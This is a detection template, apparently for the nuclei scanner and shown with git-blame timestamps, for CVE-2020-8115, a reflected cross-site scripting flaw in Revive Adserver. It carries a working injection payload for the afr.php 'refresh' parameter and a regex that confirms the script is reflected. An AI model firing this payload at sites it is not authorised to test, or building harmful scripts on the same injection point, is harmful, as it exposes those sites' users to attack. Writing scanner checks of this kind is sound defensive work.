2020-09-15 19:25:55 +00:00
|
|
|
id: cve-2020-8115
|
2020-04-08 11:27:13 +00:00
|
|
|
|
|
|
|
info:
|
|
|
|
name: Revive Adserver XSS
|
2020-07-08 20:22:44 +00:00
|
|
|
author: madrobot & dwisiswant0
|
2020-05-25 07:49:06 +00:00
|
|
|
severity: medium
|
2020-04-08 11:27:13 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
2020-04-09 13:02:30 +00:00
|
|
|
- "{{BaseURL}}/www/delivery/afr.php?refresh=10000&\")',10000000);alert(1337);setTimeout('alert(\""
|
2020-07-08 11:38:57 +00:00
|
|
|
matchers-condition: and
|
2020-04-08 11:27:13 +00:00
|
|
|
matchers:
|
|
|
|
- type: status
|
|
|
|
status:
|
2020-05-25 07:49:06 +00:00
|
|
|
- 200
|
2020-07-08 20:22:44 +00:00
|
|
|
- type: regex
|
2020-04-08 11:27:13 +00:00
|
|
|
part: body
|
2020-07-08 20:22:44 +00:00
|
|
|
regex:
|
|
|
|
- (?mi)window\.location\.replace\(".*alert\(1337\)
|